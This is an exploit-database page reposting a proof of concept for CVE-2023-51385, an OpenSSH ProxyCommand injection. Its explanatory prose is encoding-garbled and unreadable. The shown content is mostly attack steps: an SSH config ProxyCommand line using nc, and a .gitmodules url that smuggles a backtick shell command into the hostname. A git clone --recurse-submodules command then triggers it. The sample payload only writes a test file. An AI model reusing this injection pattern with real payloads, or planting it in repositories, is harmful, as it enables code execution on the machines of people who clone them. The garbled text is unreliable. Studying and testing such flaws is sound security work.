Sploitus

Exploit for CVE-2023-51385_test

kitploit ┬╖ 2026-08-28

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FEATHERW1T-CVE-2023-51385_TEST
## CVE-2023-51385 рдХреА рдкреБрд╖реНрдЯрд┐ рдХрд░реЗрдВ

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ `~/.ssh/config` рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕рд╛рдордЧреНрд░реА рдЬреЛрдбрд╝реЗрдВ

root@kitploit:~
    
    
    host *.example.com
      ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
    

`.gitmodules` рдлрд╝рд╛рдЗрд▓ рдХреЗ рд╕реНрдЯреЗрдЯрдореЗрдВрдЯ рдореЗрдВ рдХрдорд╛рдВрдб рдЗрдВрдЬреЗрдХреНрд╢рди рдореМрдЬреВрдж рд╣реИ

root@kitploit:~
    
    
    url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
    

рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдкреВрд░рд╛ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рдиреАрдЪреЗ рджрд┐рдП рдЧрдП рдХрдорд╛рдВрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдХреЗ рдЯреНрд░рд┐рдЧрд░ рдХрд░реЗрдВ

root@kitploit:~
    
    
    git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
    

рдпрджрд┐ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддрд╛ рд╣реИ рддреЛ CVE-2023-51385_test рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ cve.txt рдлрд╝рд╛рдЗрд▓ рдмрди рдЬрд╛рдПрдЧреА

рдиреЛрдЯ: OpenSSH рдХреЛ <9.6p1 рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ

рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдпрд╣ рдмреНрд▓реЙрдЧ рджреЗрдЦреЗрдВ:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html